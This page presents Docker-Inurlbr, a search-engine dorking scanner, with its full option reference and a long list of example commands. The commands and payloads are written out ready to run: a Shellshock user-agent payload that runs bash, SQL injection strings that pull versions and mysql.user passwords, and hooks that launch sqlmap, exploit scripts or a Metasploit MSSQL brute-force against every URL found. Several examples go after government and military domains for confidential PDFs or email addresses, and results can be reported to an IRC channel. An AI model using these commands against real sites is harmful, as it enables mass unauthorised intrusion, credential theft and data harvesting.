Docker-Inurlbr – Advanced Search In Search Engines, Enables Analysis Provided To Exploit GET / POST Capturing Emails & Urls

Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.
vulnerable URLs.

Example: -s {file}
Usage: -s your_file.txt

-o Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
Example: -o {file_where_my_urls_are}
Usage: -o tests.txt

--persist Attempts when Google blocks your search.
The script tries to another google host / default = 4
Example: --persist {number_attempts}
Usage: --persist 7

--ifredirect Return validation method post REDIRECT_URL
Example: --ifredirect {string_validation}
Usage: --ifredirect '/admin/painel.php'

-m Enable the search for emails on the urls specified.

-u Enables the search for URL lists on the url specified.

--gc Enable validation of values ​​with google webcache.

--pr Progressive scan, used to set operators (dorks),
makes the search of a dork and valid results, then goes a dork at a time.

--file-cookie Open cookie file.

--save-as Save results in a certain place.

--shellshock Explore shellshock vulnerability by setting a malicious user-agent.

--popup Run --command all or vuln in a parallel terminal.

--cms-check Enable simple check if the url / target is using CMS.

--no-banner Remove the script presentation banner.

--unique Filter results in unique domains.

--beep Beep sound when a vulnerability is found.

--alexa-rank Show alexa positioning in the results.

--robots Show values file robots.

--range Set range IP.
Example: --range {range_start,rage_end}
Usage: --range '172.16.0.5#172.16.0.255'

--range-rand Set amount of random ips.
Example: --range-rand {rand}
Usage: --range-rand '50'

--irc Sending vulnerable to IRC / server channel.
Example: --irc {server#channel}
Usage: --irc 'irc.rizon.net#inurlbrasil'

--http-header Set HTTP header.
Example: --http-header {youemail}
Usage: --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'

--sedmail Sending vulnerable to email.
Example: --sedmail {youemail}
Usage: --sedmail [email protected]

--delay Delay between research processes.
Example: --delay {second}
Usage: --delay 10

--time-out Timeout to exit the process.
Example: --time-out {second}
Usage: --time-out 10

--ifurl Filter URLs based on their argument.
Example: --ifurl {ifurl}
Usage: --ifurl index.php?id=

--ifcode Valid results based on your return http code.
Example: --ifcode {ifcode}
Usage: --ifcode 200

--ifemail Filter E-mails based on their argument.
Example: --ifemail {file_where_my_emails_are}
Usage: --ifemail sp.gov.br

--url-reference Define referring URL in the request to send him against the target.
Example: --url-reference {url}
Usage: --url-reference http://target.com/admin/user/valid.php

--mp Limits the number of pages in the search engines.
Example: --mp {limit}
Usage: --mp 50

--user-agent Define the user agent used in its request against the target.
Example: --user-agent {agent}
Usage: --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
Usage-exploit / SHELLSHOCK:
--user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
Complete command:
php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'

--sall Saves all urls found by the scanner.
Example: --sall {file}
Usage: --sall your_file.txt

--command-vul Every vulnerable URL found will execute this command parameters.
Example: --command-vul {command}
Usage: --command-vul 'nmap sV -p 22,80,21 _TARGET_'
--command-vul './exploit.sh _TARGET_ output.txt'
--command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

--command-all Use this commmand to specify a single command to EVERY URL found.
Example: --command-all {command}
Usage: --command-all 'nmap sV -p 22,80,21 _TARGET_'
--command-all './exploit.sh _TARGET_ output.txt'
--command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
[!] Observation:

_TARGET_ will be replaced by the URL/target found, although if the user
doesn't input the get, only the domain will be executed.

_TARGETFULL_ will be replaced by the original URL / target found.

_TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.

_TARGETIP_ return of ip URL / target found.

_URI_ Back URL set of folders / target found.

_RANDOM_ Random strings.

_PORT_ Capture port of the current test, within the --port-scan process.

_EXPLOIT_ will be replaced by the specified command argument --exploit-command.
The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_

--replace Replace values ​​in the target URL.
Example: --replace {value_old[INURL]value_new}
Usage: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
--replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
--replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'

--remove Remove values ​​in the target URL.
Example: --remove {string}
Usage: --remove '/admin.php?id=0'

--regexp Using regular expression to validate his research, the value of the
Expression will be sought within the target/URL.
Example: --regexp {regular_expression}
All Major Credit Cards:
Usage: --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'

IP Addresses:
Usage: --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'

EMAIL:
Usage: --regexp '([wd.-_]+)@([wd._-]+)'


---regexp-filter Using regular expression to filter his research, the value of the
Expression will be sought within the target/URL.
Example: ---regexp-filter {regular_expression}
EMAIL:
Usage: ---regexp-filter '([wd.-_]+)@([wd._-]+)'


[!] Small commands manager:

--exploit-cad Command register for use within the scanner.
Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
Example Format: NMAP::nmap -sV _TARGET_
Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
Usage: --exploit-cad 'NMAP::nmap -sV _TARGET_'
Observation: Each registered command is identified by an id of your array.
Commands are logged in exploits.conf file.

--exploit-all-id Execute commands, exploits based on id of use,
(all) is run for each target found by the engine.
Example: --exploit-all-id {id,id}
Usage: --exploit-all-id 1,2,8,22

--exploit-vul-id Execute commands, exploits based on id of use,
(vull) run command only if the target was considered vulnerable.
Example: --exploit-vul-id {id,id}
Usage: --exploit-vul-id 1,2,8,22

--exploit-list List all entries command in exploits.conf file.


[!] Running subprocesses:

--sub-file Subprocess performs an injection
strings in URLs found by the engine, via GET or POST.
Example: --sub-file {youfile}
Usage: --sub-file exploits_get.txt

--sub-get defines whether the strings coming from
--sub-file will be injected via GET.
Usage: --sub-get

--sub-post defines whether the strings coming from
--sub-file will be injected via POST.
Usage: --sub-get


--sub-cmd-vul Each vulnerable URL found within the sub-process
will execute the parameters of this command.
Example: --sub-cmd-vul {command}
Usage: --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
--sub-cmd-vul './exploit.sh _TARGET_ output.txt'
--sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

--sub-cmd-all Run command to each target found within the sub-process scope.
Example: --sub-cmd-all {command}
Usage: --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
--sub-cmd-all './exploit.sh _TARGET_ output.txt'
--sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'


--port-scan Defines ports that will be validated as open.
Example: --port-scan {ports}
Usage: --port-scan '22,21,23,3306'

--port-cmd Define command that runs when finding an open door.
Example: --port-cmd {command}
Usage: --port-cmd './xpl _TARGETIP_:_PORT_'
--port-cmd './xpl _TARGETIP_/file.php?sqli=1'

--port-write Send values for door.
Example: --port-write {'value0','value1','value3'}
Usage: --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"



[!] Modifying values used within script parameters:

md5 Encrypt values in md5.
Example: md5({value})
Usage: md5(102030)
Usage: --exploit-get 'user?id=md5(102030)'

base64 Encrypt values in base64.
Example: base64({value})
Usage: base64(102030)
Usage: --exploit-get 'user?id=base64(102030)'

hex Encrypt values in hex.
Example: hex({value})
Usage: hex(102030)
Usage: --exploit-get 'user?id=hex(102030)'

Generate random values.
Example: random({character_counter})
Usage: random(8)
Usage: --exploit-get 'user?id=random(8)'

Simple Commands

docker exec inurlbr ./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"  

docker exec inurlbr ./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'

docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'

docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

docker exec inurlbr ./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_'

docker exec inurlbr ./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'

docker exec inurlbr ./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([wd.-_]+)@([wd._-]+)'

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

docker exec inurlbr ./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6

docker exec inurlbr ./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'

docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6

docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'

docker exec inurlbr ./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a ''

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5

docker exec inurlbr ./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'

docker exec inurlbr ./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'

docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8

docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 --pr

docker exec inurlbr ./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --pr --shellshock

docker exec inurlbr ./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 'xpls_Arbitrary_File_Download.txt'

Developers

----------------------------------------------
Original Version
----------------------------------------------
[+] AUTOR: googleINURL
[+] EMAIL: [email protected]
[+] Blog: http://blog.inurl.com.br
----------------------------------------------
Docker Version
----------------------------------------------
[+] AUTOR: Gabriel Dutra (c0olr00t)
[+] EMAIL: [email protected]
[+] LINKEDIN: linkedin.com/in/gmdutra/
----------------------------------------------
Download Docker-Inurlbr